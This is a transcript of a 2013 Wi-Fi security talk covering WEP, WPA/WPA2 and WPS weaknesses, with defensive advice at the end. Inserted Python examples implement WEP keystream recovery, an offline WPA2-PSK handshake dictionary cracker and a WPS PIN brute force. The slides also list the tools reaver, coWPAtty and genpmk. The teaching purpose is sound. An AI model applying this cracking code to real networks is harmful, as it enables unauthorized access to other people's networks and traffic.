Wi-Fi Sec Null
by Vikas Jain, 25 August 2013


Transcript of Wi-Fi Sec Null

Wi-Fi Security
Open
  Obviously not advised
  Everyone has access to the network and hence to your data
WEP
WPA
WPA2
  Significant improvements over WPA
  Strong encryption and authentication support
  Advised for use in almost all environments
What is Wi-Fi?
Wi-Fi is popularly expanded as "Wireless Fidelity", although the Wi-Fi Alliance treats the name as a brand rather than an acronym
The idea of wireless networks emerged as early as 1985

Wi-Fi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves
The Wi-Fi Alliance
A trade association
Promotes Wi-Fi technology
Certifies Wi-Fi products if they conform to certain standards of interoperability.
Owns the Wi-Fi trademark

Wi-Fi: Standards
802.11b (July 1999)
  11 Mbps @ 2.4 GHz
  Full speed up to 300 feet
  Coverage up to 1750 feet
802.11a
  54 Mbps @ 5 GHz
  Not interoperable with 802.11b
  Limited distance
  Dual-mode (a/b) APs require two chipsets and look like two APs to clients
802.11g
  54 Mbps @ 2.4 GHz
  Same range as 802.11b
  Backward-compatible with 802.11b
  Speeds slower in dual (b/g) mode
  Attempts to combine the best of both 802.11a and 802.11b

The Wi-Fi Alliance defines Wi-Fi as any "wireless local area network (WLAN) products that are based on the Institute of Electrical and Electronics Engineers' (IEEE) 802.11 standards"

Only Wi-Fi products that complete Wi-Fi Alliance interoperability certification testing successfully may use the "Wi-Fi CERTIFIED" trademark!!!

802.11i
  Adds AES encryption (CCMP)
  Requires more CPU; new chips required
  TKIP is the interim solution for existing hardware
802.11n
  100 Mbps+
  Designed to improve on 802.11g in the amount of bandwidth supported by utilizing multiple wireless signals and antennas (called MIMO technology) instead of one
  Offers somewhat better range than earlier Wi-Fi standards due to its increased signal intensity
  Equipment is backward-compatible with 802.11g gear
WPA (Wi-Fi Protected Access)
  The Wi-Fi Alliance's pre-standard release of a subset of 802.11i, forward-compatible with 802.11i (WPA2)
  Encryption: version one uses TKIP
  Authentication: 802.1X & EAP (allows auth via RADIUS); also allows auth via a PSK
What do we use Wi-Fi for?
Secure? Let's see..
LAN (wired)
Wi-Fi: the signal travels through the air => visible to everyone
But is it accessible to everyone? WHY?
GLOSSARY
  SSID/ESSID: the human-readable network name the AP announces in its beacons
  BSSID: the MAC address of the access point radio serving the network
  Channel: the frequency slot the network operates on (1-14 at 2.4 GHz)
  WLAN packet: an 802.11 frame (management, control or data)
  Beacons/frames: management frames the AP broadcasts periodically with its SSID, channel and capabilities
  Packet injection: transmitting arbitrary crafted 802.11 frames from a card (needs driver support)
  Monitor mode: card mode that captures every 802.11 frame on a channel without associating to any network

Open: No security configured
WPA (Wi-Fi Protected Access): Advanced
  Works with old hardware (the same as WEP)
  Aimed at improving WEP without changing hardware
  Uses TKIP (Temporal Key Integrity Protocol)
WEP: Wired Equivalent Privacy
WEP - How to Crack!!!
WEP: Intro
  The original native security mechanism for WLANs
  Provides security for an 802.11 network
  Used to protect wireless communication from eavesdropping (confidentiality)
  Prevent unauthorized access to a wireless network (access control)
  Prevent tampering with transmitted messages (integrity)
  Provide users with a level of privacy equivalent to a wired LAN, built into the wireless network
How does it work?
WEP encryption
  Appends a 32-bit CRC checksum (the ICV) to each outgoing frame (INTEGRITY)
  Encrypts the frame using the RC4 stream cipher, seeded with a 40-bit (standard) or 104-bit (enhanced) shared key plus a 24-bit initialization vector (IV) (CONFIDENTIALITY)
WEP decryption
  The receiver reads the IV from the frame header, regenerates the same RC4 keystream from IV + key, XORs it with the payload and verifies the ICV

The initialization vector (IV) and the default (shared) key configured on the station and access point are concatenated (IV || key) to seed RC4, which produces the keystream
The keystream is then XORed with the plaintext message (plus its ICV) to produce the WEP encrypted frame

Step 1: The Key Scheduling Algorithm (KSA)
  Involves creating a scrambled 256-byte state array from the seed (IV || key)
  This state array is then used as input to the second phase, called the PRGA phase
Step 2: The Pseudo-Random Generation Algorithm (PRGA)
  The state array from the KSA process is used here to generate the final keystream
  Each byte of the keystream is then XORed with the corresponding plaintext byte to produce the desired ciphertext

Output: the desired ciphertext, i.e. the encrypted frame body ((plaintext + ICV) XOR keystream)
ICV (Integrity Check Value) = CRC-32 (cyclic redundancy check) integrity check; CRC-32 is linear and unkeyed, so it does not actually stop deliberate tampering

XOR operation, defined as:
  plaintext XOR keystream = ciphertext
  ciphertext XOR keystream = plaintext
  plaintext XOR ciphertext = keystream

The Initialization Vector
  WEP-encrypted networks can be cracked in 10 minutes
  Goal is to collect enough IVs (distinct keystreams under the same key) to be able to crack the key
  IV = Initialization Vector, transmitted in the clear at the start of each encrypted frame
  Only 24 bits long, so IVs (and therefore keystreams) repeat on a busy network
  Injecting packets generates IVs faster than waiting for normal traffic
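The encryption steps and XOR identities above, worked through in Python as an added example (this is not code from the presentation; the frame layout of IV || key-id byte || RC4(plaintext || ICV) is the real WEP one, while the key, IV and packet contents are constructed for the demo). It shows KSA, PRGA, ICV and IV handling, then recovers the keystream from one frame whose plaintext is known and uses it to read a second frame sent under the same IV without ever touching the key:

```python
"""WEP frame encryption/decryption with RC4 (KSA + PRGA), a CRC-32 ICV and a
24-bit IV, plus keystream recovery from a known plaintext.

Added example, not code from the presentation. The frame layout is the real
WEP one (IV || key-id byte || RC4(plaintext || ICV)); the key, IV and packet
contents below are constructed for the demo, not captured traffic.
"""
import struct
import zlib


def rc4_ksa(key: bytes) -> list:
    """Key Scheduling Algorithm: build the scrambled 256-byte state array."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_prga(s: list, n: int) -> bytes:
    """Pseudo-Random Generation Algorithm: emit n keystream bytes from the state."""
    s = s[:]  # work on a copy so the caller's state array stays reusable
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Return IV || key-id byte || RC4_{IV||key}(plaintext || ICV)."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)  # 40- or 104-bit key
    keystream = rc4_prga(rc4_ksa(iv + wep_key), len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """Read the IV, regenerate the keystream from IV || key, XOR, verify the ICV."""
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4_prga(rc4_ksa(iv + wep_key), len(body)))
    plaintext, received_icv = data[:-4], data[-4:]
    if received_icv != icv(plaintext):
        raise ValueError("ICV check failed")
    return plaintext


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """plaintext XOR ciphertext = keystream. If the whole plaintext is known the
    ICV is known too, so the full keystream for this IV falls out, no key needed."""
    return xor(frame[4:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt a different frame that reused the same IV (hence the same keystream).
    Works for any frame no longer than the recovered keystream; the ICV is dropped."""
    return xor(frame[4:], keystream)[:-4]


def tamper_detected(frame: bytes, wep_key: bytes) -> bool:
    """Flip one ciphertext bit and see whether the ICV catches it (it does here,
    but an attacker who also fixes up the linear CRC would not be caught)."""
    bad = bytearray(frame)
    bad[10] ^= 0x01
    try:
        wep_decrypt(wep_key, bytes(bad))
        return False
    except ValueError:
        return True


# Constructed demo values (not real traffic): a 104-bit key and a reused IV.
DEMO_KEY = bytes.fromhex("0102030405060708090a0b0c0d")
DEMO_IV = bytes.fromhex("0a1b2c")
# The LLC/SNAP header is the classic known plaintext at the start of every data frame.
LLC_SNAP = bytes.fromhex("aaaa030000000800")


def demo() -> tuple:
    """Two frames under one IV: read the second using only the first's plaintext."""
    frame1 = wep_encrypt(DEMO_KEY, DEMO_IV, LLC_SNAP + b"GET /index.html")
    frame2 = wep_encrypt(DEMO_KEY, DEMO_IV, LLC_SNAP + b"secret-payload")
    ks = recover_keystream(frame1, LLC_SNAP + b"GET /index.html")  # 27 keystream bytes
    leaked = decrypt_with_keystream(frame2, ks)                     # no key used
    return wep_decrypt(DEMO_KEY, frame1), leaked, ks


if __name__ == "__main__":
    legit, leaked, ks = demo()
    print(legit, leaked, ks.hex())
```

Every IV reuse hands the attacker another pair of frames to play this trick on, which is why collecting (or injecting traffic to provoke) many IVs is the heart of every WEP attack.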
Popular WEP Attacks
  ARP replay attack: capture an encrypted ARP request and reinject it so the AP answers with a flood of fresh IVs
  Fragmentation attack: recover a long stretch of keystream (PRGA) from a single captured packet
  Chopchop: decrypt a packet byte by byte, using the AP's ICV check as an oracle
  Caffe Latte: attack the client instead of the AP, so the target network need not even be in range
WPA/WPA2 - How to pwn!!!
WPA: Intro
WPA2: Intro
  Based on the IEEE 802.11i standard
  2 versions: Personal & Enterprise
  The primary enhancement over WPA is the use of the AES (Advanced Encryption Standard) algorithm (CCMP)
  WPA2 mandates AES-CCMP; TKIP is only kept for backward compatibility in mixed mode
  The Personal mode uses a PSK (pre-shared key) & does not require separate authentication of users
  The Enterprise mode requires the users to be separately authenticated using the EAP protocol

WPA: Intro (TKIP)
  Data encrypted using the RC4 stream cipher, with a 128-bit per-packet key & a 48-bit initialization vector (the TKIP sequence counter)
  Temporal Key Integrity Protocol (TKIP) dynamically changes keys as the system is used: the major improvement of WPA over WEP
  Combined with the much larger IV, this defeats the well-known key-recovery attacks on WEP
WEP: Summary
  Weakest of all: not recommended
  Limitation: keys are fixed-length hexadecimal strings (40 or 104 bits), so no passphrases with special characters
  Methods to break it were devised years ago
  Takes less than 15 minutes to break in!!
WPA/WPA2 Attacks

WPA2 WEAKNESSES
  Can't protect against upper-layer session hijacking
  Can't stand against physical-layer attacks:
    RF jamming
    Data flooding
    Access point failure
  Vulnerable to MAC address spoofing

WPA-PSK protected networks are vulnerable to dictionary attacks
To do:
  Spoof the MAC address of the AP and send the client a deauthentication frame so it reconnects
  Sniff the wireless network for the WPA-PSK 4-way handshake
  Run coWPAtty against the handshake to crack the key
Speedup!!!
  Use genpmk to precompute the PMK (the slow PBKDF2 step) for every candidate passphrase
  Needs the SSID to crack WPA-PSK, because the SSID is the salt in the PMK derivation; easily obtainable!
  The same precomputed tables also work for WPA2-PSK, since the PMK derivation is identical!
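The handshake attack above, carried through as an added example in Python (not code from the presentation, nor from coWPAtty or genpmk): the station side derives PMK, PTK and the message-2 MIC exactly as 802.11i specifies for WPA2/CCMP, and the attacker side recomputes that MIC for each wordlist entry until one matches. The SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are all constructed for the demo, not captured traffic, and the EAPOL frame is a stand-in with the MIC field zeroed rather than a byte-exact 802.1X frame.

```python
"""WPA2-PSK key derivation and the offline dictionary attack on a captured
4-way handshake (what genpmk/coWPAtty automate).

Added example, not from the presentation or the coWPAtty project. The
derivations (PBKDF2 PMK, PRF-512 PTK, HMAC-SHA1 MIC over the EAPOL frame)
follow IEEE 802.11i for WPA2/CCMP; the SSID, MACs, nonces, EAPOL bytes and
wordlist are constructed for the demo, not captured traffic.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt: that is why the attacker needs it and why genpmk
    tables are only valid for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, both MAC addresses and both nonces (byte-wise min/max ordering).
    CCMP only needs the first 48 bytes; the KCK used for the MIC is bytes 0-15."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (CCMP) message-2 MIC: first 16 bytes of HMAC-SHA1 keyed with the KCK
    over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


# Constructed handshake parameters (not captured traffic).
SSID = "HackMeIfUCan"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for the EAPOL-Key message 2 body, MIC field already zeroed.
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 40 + SNONCE + b"\x00" * 32
TRUE_PASSPHRASE = "correct horse"
WORDLIST = ["password", "12345678", "letmein!", "correct horse", "HackMeIfUCan"]


def client_mic(passphrase: str) -> bytes:
    """Station side: the MIC it puts in message 2, computed from its own PSK."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2)


def build_pmk_table(wordlist, ssid=SSID) -> dict:
    """genpmk's job: passphrase -> PMK for one SSID, done once and reused."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack_psk(captured_mic: bytes, wordlist, ssid=SSID, pmk_table=None):
    """Attacker side: recompute the MIC for each candidate and compare with the
    sniffed one. With a PMK table the 4096-round PBKDF2 per guess disappears and
    only the cheap PRF + HMAC remain."""
    for candidate in wordlist:
        pmk = pmk_table[candidate] if pmk_table else pmk_from_passphrase(candidate, ssid)
        ptk = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk[:16], EAPOL_MSG2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    sniffed = client_mic(TRUE_PASSPHRASE)  # what the attacker captures from the air
    print(crack_psk(sniffed, WORDLIST))
    print(crack_psk(sniffed, WORDLIST, pmk_table=build_pmk_table(WORDLIST)))
```

Nothing in the loop talks to the AP, which is why the attack is offline and only the passphrase strength limits it; a random passphrase of 20+ characters is simply not in any wordlist.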

DEMO
WPS (Wi-Fi Protected Setup)
  Created by the Wi-Fi Alliance and introduced in 2006
  It's the little password button thingy (push-button or PIN setup)
  Easiest way by far to break into WPA2
  It is an 8-digit numeric PIN
  The 8th digit is a checksum, and the AP validates the PIN in two halves (4 + 3 digits), so at most 10^4 + 10^3 = 11,000 guesses
  Some routers give you no option to disable or change it
  An attacker needs a couple of hours to crack in
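Why the PIN search is 11,000 guesses rather than 10^7, as an added example in Python (not code from the presentation or from Reaver): the checksum rule is the real WPS one, while the registrar below is a stand-in that only mimics the protocol's behaviour of rejecting a wrong first half at M4 before the second half is ever checked at M6.

```python
"""WPS PIN checksum and the split-PIN brute force (what Reaver exploits).

Added example, not from the presentation or from Reaver. wps_checksum() is the
real WSC check-digit rule; FakeRegistrar is a constructed stand-in for an AP
that answers the first PIN half (M4) separately from the second (M6).
"""


def wps_checksum(first7: str) -> int:
    """Check digit: 3 * (d1+d3+d5+d7) + (d2+d4+d6), then complement mod 10."""
    acc = 0
    for i, ch in enumerate(first7):
        acc += 3 * int(ch) if i % 2 == 0 else int(ch)
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class FakeRegistrar:
    """Stand-in AP (constructed). A real registrar NACKs at M4 when the first
    half is wrong and only evaluates the second half once the first was right."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self._pin = pin
        self.queries = 0  # each check is one online round trip in reality

    def check_first_half(self, half: str) -> bool:
        self.queries += 1
        return half == self._pin[:4]

    def check_second_half(self, half: str) -> bool:
        self.queries += 1
        return half == self._pin[4:]


def brute_force_pin(reg: FakeRegistrar) -> str:
    """Reaver-style search: up to 10^4 tries for the first half, then up to 10^3
    for the second, because the 8th digit is derived rather than guessed."""
    first = next(f"{i:04d}" for i in range(10_000) if reg.check_first_half(f"{i:04d}"))
    for j in range(1_000):
        tail = f"{j:03d}"
        second = tail + str(wps_checksum(first + tail))
        if reg.check_second_half(second):
            return first + second
    raise RuntimeError("unreachable for a valid PIN")


if __name__ == "__main__":
    reg = FakeRegistrar("12345670")  # a well-known default PIN; valid checksum
    print(brute_force_pin(reg), reg.queries)
```

Even at the worst case the search never exceeds 11,000 round trips, so the only real protections are disabling WPS or an AP that locks WPS after a few failures.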
Tools
  wash: scans for WPS-enabled APs and shows whether WPS is locked
  reaver: brute-forces the WPS PIN online
  coWPAtty: dictionary attack against a captured WPA/WPA2-PSK handshake
  genpmk: precomputes PMK tables for coWPAtty for a given SSID
Advice for Victims
Wi-Fi Security
Vikas Jain
I am
  A security consultant
  A network security engineer
  A passionate ethical hacker
A brief history of mine
  Born in Bikaner, Rajasthan
  SS Engr. @ APPIN Hyderabad
  Security Analyst @ Cartel Software
Where can we find Wi-Fi?
What do we Use Wi-Fi for?
Steps to hack a LAN!
  Locate the victim's network wire pole
  Get up on the pole; keep your crimper handy!
  Find the hard wire
  Cut it in the middle
  Fit a jack
  Enjoy hacking!!
ESSID = HackMeIfUCan
Don't ever do that
My pleasure
DO's
  Use HTTPS instead of HTTP
  Use a VPN for extra protection
  Lower your router's Tx power to the minimum you need
  Use a password with random characters & symbols; keep it as long as you can remember
  If possible, disable WPS or flash the router with DD-WRT
DON'Ts
  Never use the same password everywhere
  Never shop on public Wi-Fi; don't even use it
CEH Trainer @ Jagsar Int.
HACKS COMPLETE!!!
Questions?